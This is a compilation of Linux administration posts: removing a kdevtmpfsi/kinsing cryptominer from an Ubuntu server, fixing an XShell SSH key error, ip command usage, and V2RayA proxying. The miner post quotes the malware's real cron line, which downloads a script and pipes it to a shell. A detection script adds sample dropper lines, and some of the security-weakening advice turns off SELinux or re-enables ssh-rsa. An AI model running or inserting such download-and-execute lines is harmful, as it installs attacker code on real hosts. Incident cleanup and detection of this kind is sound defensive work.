How to Fix the kdevtmpfsi and kinsing Mining Virus Infection on an Ubuntu Server

My server is running Ubuntu 24. Today, after installing and configuring a WordPress blog based on Nginx 1.24, PHP 8.3, and MySQL 8.0, I ran the following command to check the server load:

$ top -i

I noticed that the kdevtmpfsi process was using 100% of the CPU. A quick search revealed that this is a malicious mining process. Typically, two malicious mining processes—kdevtmpfsi and kinsing—are found together. Here’s how I resolved the issue:

Step 1: Kill the kdevtmpfsi and kinsing Processes

First, find the process ID (PID) for kdevtmpfsi and kill it:

# [k] keeps grep from matching its own command line; -r skips kill when nothing matches
$ ps aux | grep '[k]devtmpfsi' | awk '{print $2}' | xargs -r sudo kill -9

Next, find the PID for kinsing and kill it:

$ ps aux | grep '[k]insing' | awk '{print $2}' | xargs -r sudo kill -9

Step 2: Find and Remove the Malicious Program Files

Now, search for and remove any files associated with kdevtmpfsi and kinsing:

# the patterns are quoted so the shell passes them to find instead of expanding them
$ sudo find / -iname 'kdevtmpfsi*' -exec rm -fv {} \;
$ sudo find / -iname 'kinsing*' -exec rm -fv {} \;

The output should look like this:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Step 3: Check for Scheduled Tasks Set by www-data User

The top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks for this user:

$ sudo crontab -l -u www-data

I found the following task:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

This cron job downloads and executes the unk.sh script, which in turn downloads and runs the kdevtmpfsi and kinsing programs. To remove this scheduled task, I ran:

$ sudo crontab -r -u www-data

Then, I deleted the unk.sh script:

$ sudo find / -iname unk.sh -exec rm -fv {} \;

Step 4: Create Non-Executable Placeholder Files for kdevtmpfsi and kinsing

To prevent the kdevtmpfsi and kinsing files from being executed again, I created them as non-executable placeholder files and set them to read-only:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

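This ensures that these two files are no longer executable and cannot run. It covers only these exact paths: the files removed in Step 2 also included randomly suffixed names such as /tmp/kdevtmpfsi962782589, so the placeholders complement the later steps rather than replace them.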

Step 5: Enable UFW Firewall and Block Malicious IP

I enabled the UFW firewall and blocked access from the IP address 185.122.204.197, which was being used for the malicious downloads:

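# ufw applies the first rule that matches, so the deny rules are added before the allow rules
$ sudo ufw deny from 185.122.204.197
# the cron job downloaded from this address, so outbound traffic to it is blocked as well
$ sudo ufw deny out to 185.122.204.197
$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https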

To check the UFW status:

$ sudo ufw status numbered

Step 6: Restrict PHP-FPM to Localhost

According to online resources, this issue is likely due to the php-fpm service exposing port 9000 to the internet. To fix this, I edited the php-fpm configuration file:

$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf

I changed the following line:

listen = 9000

to:

listen = 127.0.0.1:9000

This restricts php-fpm to only listen on the local 127.0.0.1 IP address. To apply the changes, I restarted the php-fpm service:

$ sudo systemctl restart php8.3-fpm
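
Two read-only checks to run after the steps above, added here as an example and not part of the original post: flag_cron_droppers flags crontab entries that pipe a download straight into a shell (Step 3), and exposed_listeners lists the non-loopback addresses a port is bound to in ss -ltn output (Step 6). The function names and the sample data are constructed for illustration.

```sh
#!/bin/sh
# Post-cleanup checks for the procedure above (added example; function names
# and sample data are constructed for illustration).

# Read crontab text on stdin and print "LINE_NO:entry" for every active entry
# that downloads something with wget/curl and pipes it straight into a shell.
flag_cron_droppers() {
    grep -nEv '^[[:space:]]*(#|$)' |
        grep -E '(wget|curl)[^|;&]*[|][[:space:]]*(ba|da|z|k)?sh([[:space:]]|$)'
}

# Read `ss -ltn` output on stdin and print every local address on which
# TCP port $1 is listening, skipping loopback addresses (127.0.0.0/8, ::1).
exposed_listeners() {
    awk -v port="$1" '
        $1 == "LISTEN" {
            n = split($4, part, ":")          # the port is the last ":" field
            if (part[n] != port) next
            addr = substr($4, 1, length($4) - length(part[n]) - 1)
            if (addr ~ /^127\./ || addr == "[::1]") next
            print addr
        }'
}

# Constructed crontab: lines 4 and 5 are download-and-execute jobs.
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/php /var/www/html/wp-cron.php
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
*/5 * * * * curl -fsSL http://203.0.113.10/x.sh|bash
# * * * * * wget -q -O - http://198.51.100.7/old.sh | sh
30 2 * * * wget -q https://example.org/list.txt -O /tmp/list.txt
EOF
}

# Constructed `ss -ltn` output: php-fpm with "listen = 9000" is bound to all
# addresses, while MySQL on 3306 is bound to loopback only.
sample_ss() {
    cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      511          0.0.0.0:80        0.0.0.0:*
LISTEN 0      4096               *:9000            *:*
LISTEN 0      151        127.0.0.1:3306      0.0.0.0:*
LISTEN 0      4096            [::]:22           [::]:*
EOF
}

echo "Suspicious cron entries:"; sample_crontab | flag_cron_droppers
echo "Port 9000 reachable on:";  sample_ss | exposed_listeners 9000

# On a live host (needs root), feed the functions real input instead:
#   for f in /var/spool/cron/crontabs/*; do flag_cron_droppers < "$f"; done
#   ss -ltn | exposed_listeners 9000
```

After Step 6 and the restart, exposed_listeners 9000 should print nothing on the live host.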

Reference:

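How to Fix an Ubuntu Server Infected with the kdevtmpfsi and kinsing Mining Malware

My server's operating system is Ubuntu 24. Today I installed and configured a WordPress blog based on Nginx 1.24 + PHP 8.3 + MySQL 8.0. I ran the following command to check the server load:
$ top -i
I found that the kdevtmpfsi process was using 100% of the CPU. I looked it up online, and it is said to be a malicious mining process. Two malicious mining processes usually exist together: kdevtmpfsi and kinsing. The steps to resolve this are as follows.

Step 1: find the ID of the kdevtmpfsi process and kill it:
$ ps aux | grep '[k]devtmpfsi' | awk '{print $2}' | xargs -r sudo kill -9
Find the ID of the kinsing process and kill it:
$ ps aux | grep '[k]insing' | awk '{print $2}' | xargs -r sudo kill -9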

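Step 2: use the following commands to find and delete the program files that belong to the kdevtmpfsi and kinsing processes:

$ sudo find / -iname 'kdevtmpfsi*' -exec rm -fv {} \;
$ sudo find / -iname 'kinsing*' -exec rm -fv {} \;

The output should look like this: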

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

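Step 3: the top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks set for the www-data user:

$ sudo crontab -l -u www-data
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

Sure enough, there was one. This scheduled task downloads and runs the unk.sh script at regular intervals, and that script downloads the kdevtmpfsi and kinsing programs and starts them. Delete the www-data user's scheduled tasks:
$ sudo crontab -r -u www-data
Delete the unk.sh script file:
$ sudo find / -iname unk.sh -exec rm -fv {} \;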

Step 4: create my own kdevtmpfsi and kinsing files and set them to read-only:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

After this, the kdevtmpfsi and kinsing files are no longer executable programs and cannot be run.

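Step 5: start the UFW firewall and block the IP 185.122.204.197 from accessing my server:

# ufw applies the first rule that matches, so the deny rules are added before the allow rules
$ sudo ufw deny from 185.122.204.197
# the cron job downloaded from this address, so outbound traffic to it is blocked as well
$ sudo ufw deny out to 185.122.204.197
$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https

Check the UFW status:
$ sudo ufw status numbered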

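According to material found online, this problem is most likely caused by the php-fpm service exposing port 9000 to the internet, so I edited the php-fpm configuration file:
$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf
Change this line:
listen = 9000
to:
listen = 127.0.0.1:9000
This means the php-fpm service listens only on the local IP address 127.0.0.1. Restart the php-fpm service so that the configuration change takes effect:
$ sudo systemctl restart php8.3-fpm

Reference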
https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu

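Installing nginx on Ubuntu

Environment
Ubuntu 22 Desktop

If apache2 was installed before nginx, port 80 is already being listened on by apache2. Stop the apache2 service with:
sudo systemctl stop apache2

Prevent apache2 from starting automatically at boot with:
sudo systemctl disable apache2

Because apache2 and nginx both use /var/www/html/ as the default web root, after nginx is installed and started successfully, opening the following address in Firefox on the same machine:
http://localhost
shows the apache2 welcome page. Don't be surprised: nginx installs its page in /var/www/html/ as index.nginx-debian.html. We can back up the index.html installed by apache2 with:
sudo mv /var/www/html/index.html /var/www/html/index.apache2-ubuntu22.html
Then rename index.nginx-debian.html to index.html:
sudo mv /var/www/html/index.nginx-debian.html /var/www/html/index.html
Now http://localhost shows the nginx welcome page!

After nginx is installed on Ubuntu, no nginx user and group are created by default (on CentOS an nginx user and group are created); a www-data user and group are created instead.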

How to Install PHP 8.3 on Ubuntu 24

First, update the system:

sudo apt update && sudo apt upgrade -y

On Ubuntu 24, the following command installs PHP 8.3:

sudo apt install php -y

After installation, check the PHP version:

php --version

Use the sudo apt install php8.3-PACKAGE_NAME command to install common PHP extensions, replacing PACKAGE_NAME with the name of the extension:

sudo apt install -y php8.3-cli php8.3-common php8.3-fpm php8.3-mysql php8.3-zip php8.3-gd php8.3-mbstring php8.3-curl php8.3-xml php8.3-bcmath php8.3-sqlite3 php8.3-intl php8.3-bz2 php8.3-imagick php8.3-redis

List the PHP extensions that are already installed:

php -m


How to Fix the Error “The Selected User Key is Not Registered on the Remote Host. Please Try Again” When Using XShell with SSH Private Key to Log into a Remote Linux Host

I’m working with a remote Linux host running Ubuntu 24.

Following an online tutorial, I was able to successfully SSH into the remote host using a private key file from Git Bash with the following command:

$ ssh [email protected] -i .ssh/id_rsa

However, when I try using the same command and private key file in XShell, I get the error: “The selected user key is not registered on the remote host. Please try again.”

Upon checking the SSH log file /var/log/auth.log, I found the following message:

userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]

This indicates that the SSH service on the remote host rejected the SSH-RSA public key signature algorithm during authentication, likely because it has been disabled in the remote host’s configuration.

The reason it worked in Git Bash but not in XShell is likely because Git Bash uses a newer version of the OpenSSH client that supports alternative signature algorithms (like rsa-sha2-256 or rsa-sha2-512). On the other hand, XShell may still rely on the ssh-rsa signature algorithm due to its default configuration or older client version, which results in the authentication failure.

Starting from OpenSSH 8.8, the ssh-rsa algorithm is considered insecure, and some server configurations (like Ubuntu 24) disable it by default. In this case, the PubkeyAcceptedAlgorithms configuration on the remote host may have disabled ssh-rsa, only accepting more secure algorithms such as rsa-sha2-256 or rsa-sha2-512.

To check my remote Linux host’s OpenSSH version, I ran:

$ sshd -V
OpenSSH_9.6p1 Ubuntu-3ubuntu13.5, OpenSSL 3.0.13 30 Jan 2024

It turned out to be OpenSSH 9.6.

This version of OpenSSH supports more secure public/private key pairs generated with the ECDSA (Elliptic Curve Digital Signature Algorithm). To fix the issue with XShell, I decided to regenerate a new key pair using the ECDSA algorithm. XShell provides a “New User Key Generation Wizard” under the “Tools (T)” menu to do this.

Alternative Solution: Allow ssh-rsa Algorithm (if the remote host allows it)

If you have control over the remote host, you can allow the ssh-rsa algorithm by modifying the SSH configuration file /etc/ssh/sshd_config on the remote host. Here’s how you can do it:

1 Open the SSH configuration file:

sudo vim /etc/ssh/sshd_config

2 Find and add (or modify) the following line to allow ssh-rsa:

PubkeyAcceptedAlgorithms +ssh-rsa

3 Restart the SSH service:

sudo systemctl restart ssh

If you’re using CentOS, restart sshd instead:

sudo systemctl restart sshd

Other Causes for the Error “The Selected User Key is Not Registered on the Remote Host” or “Server Refused the User Key”

1 Incorrect directory or file permissions: Ensure that the permissions for the .ssh directory and the authorized_keys file are set correctly:

chmod 700 .ssh
chmod 600 .ssh/authorized_keys

Also, ensure that authorized_keys is owned by the correct user:

chown ubuntu:ubuntu .ssh/authorized_keys

2 Incorrect key: Make sure the authorized_keys file on the server contains the public key (usually ending with .pub), not the private key.

3 SSH key authentication not enabled: The configuration file /etc/ssh/sshd_config should have the following line and it should not be commented out:

PubkeyAuthentication yes

4 Username and key mismatch: If the key is in /home/debian/.ssh/ (for the debian user), but you’re trying to log in as ubuntu, authentication will fail.

5 Root login is disabled: If /etc/ssh/sshd_config has PermitRootLogin no, you won’t be able to log in as root.

6 SELinux is enabled: Run getenforce to check the status of SELinux. The status should be Permissive, not Enforcing. Temporarily disable SELinux with:

setenforce 0

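To permanently disable SELinux, edit the /etc/sysconfig/selinux file and change SELINUX=enforcing to SELINUX=disabled. Disabling SELinux affects the whole host, not just SSH, so it is better suited to confirming the cause than to serving as the lasting fix.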

7 Incorrect authorized_keys filename: If the line in /etc/ssh/sshd_config is:

# AuthorizedKeysFile .ssh/authorized_keys

but your .ssh directory contains a file named authorized_key, you should rename it to authorized_keys.
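
The server-side checks above as a small script, added here as an example and not part of the original post: rejected_algorithms counts the signature algorithms that sshd refused in auth.log, and audit_ssh_dir checks causes 1, 2 and 7 from the list. The function names and the sample log lines are constructed; stat -c assumes GNU coreutils.

```sh
#!/bin/sh
# Server-side checks for the causes discussed above (added example; function
# names, sample log lines and the default path are constructed).

# Read auth.log lines on stdin; print "ALGORITHM COUNT" for every signature
# algorithm that sshd refused because it is not in PubkeyAcceptedAlgorithms.
rejected_algorithms() {
    sed -n 's/.*userauth_pubkey: signature algorithm \([^ ]*\) not in PubkeyAcceptedAlgorithms.*/\1/p' |
        sort | uniq -c | awk '{ print $2, $1 }'
}

# Print one finding per line for the .ssh directory $1; nothing when clean.
audit_ssh_dir() {
    dir=$1
    keys="$dir/authorized_keys"
    [ -d "$dir" ] || { echo "missing directory: $dir"; return 0; }

    # Cause 1: the expected modes are 700 (directory) and 600 (key file);
    # sshd's StrictModes refuses key files that are group- or world-writable.
    mode=$(stat -c '%a' "$dir")
    [ "$mode" = 700 ] || echo "mode $mode on $dir (expected 700)"

    # Cause 7: the file name must match AuthorizedKeysFile exactly.
    if [ ! -f "$keys" ]; then
        [ -f "$dir/authorized_key" ] &&
            echo "misnamed file: $dir/authorized_key (expected authorized_keys)"
        echo "missing file: $keys"
        return 0
    fi
    mode=$(stat -c '%a' "$keys")
    [ "$mode" = 600 ] || echo "mode $mode on $keys (expected 600)"

    # Cause 1 (ownership): the key file should belong to the directory's owner.
    [ "$(stat -c '%u' "$keys")" = "$(stat -c '%u' "$dir")" ] ||
        echo "owner of $keys differs from owner of $dir"

    # Cause 2: a private key pasted where the public key belongs.
    if grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$keys"; then
        echo "private key material found in $keys"
    fi
    return 0
}

# Constructed auth.log excerpt.
sample_auth_log() {
    cat <<'EOF'
2024-11-08T01:31:02.113+00:00 web1 sshd[2211]: userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]
2024-11-08T01:31:05.870+00:00 web1 sshd[2211]: Connection closed by authenticating user ubuntu 192.0.2.15 port 50122 [preauth]
2024-11-08T01:32:40.006+00:00 web1 sshd[2230]: userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]
2024-11-08T01:40:12.551+00:00 web1 sshd[2301]: Accepted publickey for ubuntu from 192.0.2.15 port 50188 ssh2: ECDSA SHA256:constructed
2024-11-08T01:44:19.300+00:00 web1 sshd[2344]: userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]
EOF
}

sample_auth_log | rejected_algorithms     # constructed input
audit_ssh_dir "${1:-$HOME/.ssh}"          # pass another user's .ssh as $1
```

On the server, run it as root with the target user's .ssh directory as the argument, and feed /var/log/auth.log to rejected_algorithms in place of the sample.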

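How to Fix the XShell Error “The Selected User Key is Not Registered on the Remote Host. Please Try Again” When Logging in to a Remote Linux Host over SSH with a Private Key File

My remote Linux host runs Ubuntu 24.

Following an online tutorial, I successfully logged in to the remote Linux host over SSH from Git Bash using a private key file, with the following command:

$ ssh [email protected] -i .ssh/id_rsa

However, with the same command and private key file, I could not log in to the remote Linux host over SSH from XShell; it reported the error “The selected user key is not registered on the remote host. Please try again.”

Checking the SSH log file /var/log/auth.log, I found the following message:

userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]

This shows that during public key authentication the SSH service on the remote host found that the client was using the ssh-rsa public key signature algorithm, but ssh-rsa is disabled in the remote host's configuration, so authentication failed.

Logging in with the private key works in Git Bash probably because Git Bash uses a newer OpenSSH client that can use alternative signature algorithms (such as rsa-sha2-256 or rsa-sha2-512). XShell, possibly because of its default configuration or an older client version, still relies on the ssh-rsa signature algorithm for authentication, which causes the failure.

Starting with OpenSSH 8.8, the ssh-rsa algorithm is regarded as no longer secure, and some server configurations (for example Ubuntu 24) disable it by default. The SSH service on the remote host may have disabled ssh-rsa through the PubkeyAcceptedAlgorithms setting and accept only more secure algorithms such as rsa-sha2-256 or rsa-sha2-512. Check the OpenSSH version on my remote Linux host: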

$ sshd -V
OpenSSH_9.6p1 Ubuntu-3ubuntu13.5, OpenSSL 3.0.13 30 Jan 2024

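It is OpenSSH 9.6.

OpenSSH 9.6 supports public and private keys generated with the more secure ECDSA (Elliptic Curve Digital Signature Algorithm). So my fix for the XShell problem was to generate a new key pair with the ECDSA algorithm, which can be done with XShell's “Tools (T)” -> “New User Key Generation Wizard”.

Another solution is to allow the ssh-rsa algorithm (if the remote host permits it). If you control the remote host, you can allow ssh-rsa by editing its SSH configuration file /etc/ssh/sshd_config. Open the /etc/ssh/sshd_config file: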

sudo vim /etc/ssh/sshd_config

Find and add (or modify) the following line to allow the ssh-rsa algorithm:

PubkeyAcceptedAlgorithms +ssh-rsa

Restart the SSH service:

sudo systemctl restart ssh

# If your system is CentOS

sudo systemctl restart sshd

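Other causes of the “The selected user key is not registered on the remote host. Please try again” or “Server refused the user key” problem include:

1 Directory and file permissions are not set correctly: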

chmod 700 .ssh

chmod 600 .ssh/authorized_keys

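The authorized_keys file must also belong to the user and group, for example:

chown ubuntu:ubuntu .ssh/authorized_keys

2 Wrong key: authorized_keys on the server should contain the public key (usually with a .pub file extension), not the private key.

3 Key authentication not enabled: the configuration file /etc/ssh/sshd_config should contain the line PubkeyAuthentication yes, and it must not be commented out.

4 Username and key mismatch: suppose the key is under /home/debian/.ssh/ (that is, the user is debian), but the login uses the username ubuntu.

5 Root login is prohibited: suppose /etc/ssh/sshd_config sets PermitRootLogin no, but the root account is used to log in.

6 SELinux is enabled: use the getenforce command to check the SELinux status; it should be Permissive, not Enforcing. Temporarily disable SELinux:

setenforce 0

To disable SELinux permanently, edit the /etc/sysconfig/selinux configuration file and replace SELINUX=enforcing with SELINUX=disabled.

7 The SSH configuration file /etc/ssh/sshd_config contains this line:

# AuthorizedKeysFile      .ssh/authorized_keys

but the corresponding file in your .ssh directory is named authorized_key; it should be authorized_keys.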

ip Command: Manage IP Addresses, Network Devices, Routing Tables, and Network Namespaces

Overview

The ip command in Linux is a powerful utility for managing IP addresses, network interfaces, routing tables, and network namespaces. It provides granular control over various network configurations, making it an essential tool for system administrators.

Syntax

ip addr add|del IFADDR dev IFACE | show|flush [dev IFACE] [to PREFIX]
ip route list|flush|add|del|change|append|replace|test ROUTE
ip link set IFACE [up|down] [arp on|off] [multicast on|off] \
        [promisc on|off] [mtu NUM] [name NAME] [qlen NUM] [address MAC] \
        [master IFACE | nomaster] [netns PID]
ip tunnel add|change|del|show [NAME] \
        [mode ipip|gre|sit] [remote ADDR] [local ADDR] [ttl TTL]
ip neigh show|flush [to PREFIX] [dev DEV] [nud STATE]
ip rule [list] | add|del SELECTOR ACTION

Key Features and Examples

Manage IP Addresses

View IP addresses:

ip addr

Add an IP address to a device:

ip addr add 192.168.1.1/24 dev eth0

Remove an IP address:

ip addr del 192.168.1.1/24 dev eth0

Flush all IP addresses for a device:

ip addr flush dev eth0

Manage Network Devices

Display all network interfaces:

ip link

Show specific device details:

ip link show dev eth0

Bring an interface up or down:

ip link set eth0 up
ip link set eth0 down

Set MTU for a device:

ip link set eth0 mtu 1450

Add or delete a bridge device:

ip link add br0 type bridge
ip link del br0

Create a virtual Ethernet pair:

ip link add veth0 type veth peer name veth1

Manage Routing Tables

Display the main routing table:

ip route show table main

Add a default route:

ip route add default via 10.8.1.1 dev eth0

Add a static route:

ip route add 10.8.1.0/24 via 10.8.1.1

Replace an existing route:

ip route replace 10.8.1.0/24 dev eth0

Flush the routing cache so that routing table changes take effect immediately:

ip route flush cache

Manage Routing Rules

Show routing rules:

ip rule

Add a rule to use a specific table:

ip rule add from 10.8.1.0/24 table 520

Blackhole traffic from all sources (0/0 matches every source address):

ip rule add from 0/0 blackhole

Manage Network Namespaces

List network namespaces:

ip netns

Create a network namespace:

ip netns add s1

Delete a namespace:

ip netns del s1

Execute a command within a namespace:

ip netns exec s1 ip addr

Example: Setting MTU

MTU (Maximum Transmission Unit) defines the maximum packet size for data transmission on a network device. Adjusting MTU impacts performance and compatibility.

View the current MTU for eth0:

ip link show eth0

Set MTU to 1450 bytes:

ip link set eth0 mtu 1450

Common MTU Values:

  • Ethernet: 1500 bytes (default)
  • PPPoE: 1492 bytes (8 bytes for headers)
  • Wi-Fi: Often 1500 bytes but can vary slightly.

Quick Tips with ip

Color-coded output:

ip -c addr
ip -c route

Compact display:

ip -brief link
ip -brief addr

For detailed configuration guides, check the official documentation.

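The ip Command: Managing IP Addresses, Network Devices, Routing Tables and Rules, and Network Namespaces

Description: on Linux, the ip command is used to manage IP addresses, network devices, routing tables and routing rules, and network namespaces.

Syntax: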

ip addr add|del IFADDR dev IFACE | show|flush [dev IFACE] [to PREFIX]

ip route list|flush|add|del|change|append|replace|test ROUTE

ip link set IFACE [up|down] [arp on|off] [multicast on|off]

        [promisc on|off] [mtu NUM] [name NAME] [qlen NUM] [address MAC]

        [master IFACE | nomaster] [netns PID]

ip tunnel add|change|del|show [NAME]

        [mode ipip|gre|sit] [remote ADDR] [local ADDR] [ttl TTL]

ip neigh show|flush [to PREFIX] [dev DEV] [nud STATE]

ip rule [list] | add|del SELECTOR ACTION

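Parameters:

# Helper options

ip -n s1 addr  # run ip addr inside a network namespace
ip -c link  # show interfaces in color
ip -c addr  # show IP addresses in color
ip -c route  # show routes in color
ip -brief link  # show interfaces in brief form
ip -brief addr  # show addresses in brief form
ip -brief -c link  # show interfaces in brief form, in color

# ip addr: manage IP addresses

ip addr  # show IP addresses
ip addr add 192.168.1.1/24 dev eth0  # add an IP address to the given device
ip addr del 192.168.1.1/24 dev eth0  # delete an address from the given device
ip addr flush dev eth0  # delete all IP addresses of the given device

# ip link: manage network devices

ip link  # show all network interfaces
ip link show dev eth0  # show information about the given device
ip link set eth0 up  # bring the eth0 interface up
ip link set eth0 down  # bring the eth0 interface down
ip link set eth0 mtu 1450  # set the device's MTU
ip link add br0 type bridge  # add a bridge device
ip link del br0  # delete a bridge device
ip link set eth0 master br0  # add eth0 to the bridge br0
ip link set eth0 nomaster  # remove eth0 from the bridge
ip link add veth0 type veth peer name veth1  # add a virtual Ethernet pair
ip link set veth0 netns s1  # move veth0 into a network namespace
ip link set veth1 netns s2  # move veth1 into a network namespace
ip link set veth0 netns 1  # move the device into the global network namespace

# ip route: manage routing tables

ip route  # show the main routing table
ip route show table [local|main|default|num]  # show a routing table
ip route show table main  # show the main routing table
ip route show table 520  # show routing table number 520
ip route get 8.8.8.8  # look up the route an address takes
ip route get 8.8.8.8 mark 666  # look up the route taken (with a mark)
ip route add default via 10.8.1.1 dev eth0  # add a default route
ip route add 10.8.1.0/24 via 10.8.1.1  # add a static route
ip route add 10.8.1.0/24 dev eth0  # add a directly connected route
ip route add 10.8.1.0/24 dev eth0 metric 10  # add a directly connected route with a metric
ip route add 10.8.1.0/24 dev eth0 table 520  # add a route to routing table number 520
ip route add table 520 10.8.1.0/24 dev eth0  # alternative form that puts the table name first
ip route delete 10.8.1.0/24 via 10.8.1.1  # delete a static route
ip route replace 10.8.1.0/24 dev eth0  # replace a route
ip route flush cache  # make routing table changes take effect immediately
ip route flush table 520  # empty routing table number 520

# Show which routing tables are currently defined

ip route show table all | grep -Eo 'table [^ ]+ ' | sort | uniq

# ip rule: manage routing rules

ip rule  # show routing rules
ip rule add table 520  # all packets consult routing table 520
ip rule add from 0/0 lookup 520  # all packets consult routing table 520
ip rule add from 0/0 table 520  # same as above
ip rule add from 0/0 blackhole  # drop all packets
ip rule add from 0/0 prohibit  # reject all packets; communication administratively prohibited
ip rule add from 0/0 unreachable  # return network unreachable
ip rule del table 520  # delete the rule that sends all packets to routing table 520
ip rule add from 10.8.1.0/24 table 520  # packets from a specific network use routing table 520
ip rule add to 10.8.2.0/24 table 521  # packets to a given network use routing table 521
ip rule add fwmark 588 table 520  # packets marked 588 use routing table 520
ip rule add not fwmark 588 table 51820  # packets not marked 588 use that routing table
ip rule add from 8.8.3.2/32 tos 10 table 2  # packets from a specific IP with TOS 10
ip rule add prio 100 fwmark 1 lookup 100  # a rule with priority 100

# ip netns: manage network namespaces

ip netns  # show network namespaces
ip netns add s1  # create a network namespace
ip netns del s1  # delete a network namespace
ip netns attach NAME PID  # attach the network namespace of process PID to the name NAME
ip netns exec s1 command  # run a command inside a network namespace
ip netns exec s1 ip link set lo up  # bring up the lo device inside a network namespace
ip netns identify  # show the network namespace of the current process
ip netns identify PID  # show the network namespace of the given process
ip netns pids NAME  # show the processes in a network namespace
ip -n s1 addr add 192.168.64.1/24 dev veth0  # add an address inside a network namespace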

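Examples:

1 Setting the MTU

MTU is short for Maximum Transmission Unit: the maximum number of bytes a single packet can carry in transit on a network. Put simply, the MTU defines the largest amount of data that a network device (such as a network card or router) can send at one time.

Why does the MTU matter?

  • Network performance: a larger MTU improves transfer efficiency and reduces fragmentation. But if the MTU is set too large, some network devices may be unable to handle it, causing packet loss or transmission failures.
  • Packet fragmentation: if a packet exceeds the MTU, it has to be fragmented; each fragment is sent to the destination separately and reassembled there. Too much fragmentation adds network overhead and lowers performance.
  • Compatibility: different network devices and protocols may have different MTU requirements, and a wrong setting can lead to incompatibility or packet loss.

You can view the current MTU setting of the network device eth0 with:

ip link show eth0

Set the MTU of the network device eth0 to 1450 bytes:

ip link set eth0 mtu 1450

This means that no packet passing through the eth0 interface may exceed 1450 bytes. If an application tries to send a larger packet, the network stack splits it into several smaller packets.

MTU values of common networks

  • Ethernet: the default MTU is usually 1500 bytes.
  • PPPoE (Point-to-Point Protocol over Ethernet): the MTU is usually 1492 bytes, because an extra 8 bytes are used for headers.
  • Wi-Fi: usually the same as Ethernet, 1500 bytes, though some wireless networks may be slightly lower because of protocol overhead.

Reference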

https://github.com/skywind3000/awesome-cheatsheets/blob/master/tools/ip.txt

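Using V2RayA on Ubuntu Desktop to Bypass the Great Firewall

For installing and configuring V2RayA, see the official documentation: https://v2raya.org/docs/prologue/introduction/

My operating system is Ubuntu 22, and the installed V2RayA version is 2.2.6.2.

After starting the V2RayA proxy node, I can access google.com in Firefox.

Once started, the V2RayA proxy node runs in the background of the operating system; it keeps running even if we restart the browser or the operating system.

Sometimes we download and install software packages from abroad in the terminal, and because of the GFW the connection is very slow and the download does not finish for a long time. So how can the Ubuntu terminal use v2rayA to get past the firewall?

After stopping the V2RayA proxy node, run the following command in the terminal: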

$ wget www.google.com
--2024-11-08 01:25:07--  http://www.google.com/
正在解析主机 www.google.com (www.google.com)... 31.13.94.36, 2001::1
正在连接 www.google.com (www.google.com)|31.13.94.36|:80...

It cannot connect to Google. After starting the V2RayA proxy node, run the following command in the terminal again:

$ wget www.google.com
--2024-11-08 01:27:41--  http://www.google.com/
正在解析主机 www.google.com (www.google.com)... 31.13.94.36, 2001::1
正在连接 www.google.com (www.google.com)|31.13.94.36|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 未指定 [text/html]
正在保存至: ‘index.html’

index.html                                              [ <=>                                                                                                                ]  21.11K  --.-KB/s    用时 0.002s

2024-11-08 01:27:41 (11.7 MB/s) - ‘index.html’ 已保存 [21612]

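As you can see, it connected to Google and downloaded Google's home page to the index.html file! This experiment shows that as long as the V2RayA proxy node is started successfully, the Ubuntu terminal can also go through V2RayA.

If, after starting the V2RayA proxy node, Firefox can access google.com but running wget www.google.com in the terminal cannot connect to Google, you may need to configure the proxy manually under Settings -> Network -> Network Proxy in Ubuntu.

Here 20171 is the default HTTP proxy port used by V2RayA, and 20170 is its default SOCKS5 proxy port.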

newgrp: Changing the Current User’s Group

Overview:
newgrp is a command used to change the group associated with the current user. It allows the user to switch to a different group, affecting file permissions and other operations. This command operates within the context of the currently logged-in user, meaning it cannot be used to change the group for other users.

Syntax:

newgrp [group_name]

Details:
newgrp works similarly to the login command. It allows the user to log in again under the same account but with a different group. The primary effect of running newgrp is that it switches the user’s effective group to the specified one, which will influence operations such as file access permissions.
If no group is specified, newgrp logs the user into the default group associated with the user’s username.
To use newgrp to switch groups, the user must be a member of the specified group. Otherwise, access to that group will be denied. Once a user has switched groups via newgrp, they can revert to their original group by using the exit command to close the current shell session.

Parameters:

  • group_name: The name of the group to switch to.

Example:
To add a user to the docker group:

$ sudo usermod -aG docker username

Replace username with the actual username. To add the current user to the docker group, run:

$ sudo usermod -aG docker $USER

After adding the user to the docker group, a re-login or system restart is required for the changes to take effect. Alternatively, use the following command to reload the user’s group memberships without logging out:

$ newgrp docker